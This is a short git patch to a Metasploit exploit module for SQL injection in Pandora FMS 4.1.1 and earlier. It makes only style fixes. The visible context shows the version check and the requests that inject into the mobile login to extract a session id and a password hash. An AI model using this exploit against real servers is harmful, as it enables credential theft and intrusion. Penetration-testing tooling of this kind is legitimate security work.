From faae51f39ee2b94944ce99026af2c647e338e7fb Mon Sep 17 00:00:00 2001 From: pyoor Date: Mon, 17 Feb 2014 10:13:18 -0500 Subject: [PATCH] Implemented @jlee-r7 requested changes --- modules/exploits/linux/http/pandorafms_sqli.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/pandorafms_sqli.rb b/modules/exploits/linux/http/pandorafms_sqli.rb index 61b35ef2cc..e36f2a14a5 100644 --- a/modules/exploits/linux/http/pandorafms_sqli.rb +++ b/modules/exploits/linux/http/pandorafms_sqli.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(uri, "index.php") }) - if res && res.code == 200 and res.body =~ /Pandora FMS - the Flexible Monitoring System/ && res.body =~ /(?<=xx-small;">v)(.*?)(?=<\/td>)/ + if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/ && res.body =~ /(?<=xx-small;">v)(.*?)(?=<\/td>)/ version = $1 vprint_status("#{peer} - Pandora FMS version #{version} detected") else @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - if version and version <= "4.1.1" + if version && version <= "4.1.1" return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote # Extract session id from database res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri("#{uri}", "mobile/index.php"), + 'uri' => normalize_uri(uri, "mobile/index.php"), 'vars_post' => { 'action' => "login", 'user' => sqli, @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Exploit::Remote # Extract password hash from database res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri("#{uri}", "mobile/index.php"), + 'uri' => normalize_uri(uri, "mobile/index.php"), 'vars_post' => { 'action' => "login", 'user' => sqli, @@ -398,4 +398,4 @@ class Metasploit3 < Msf::Exploit::Remote end end end -end \ No newline at end of file +end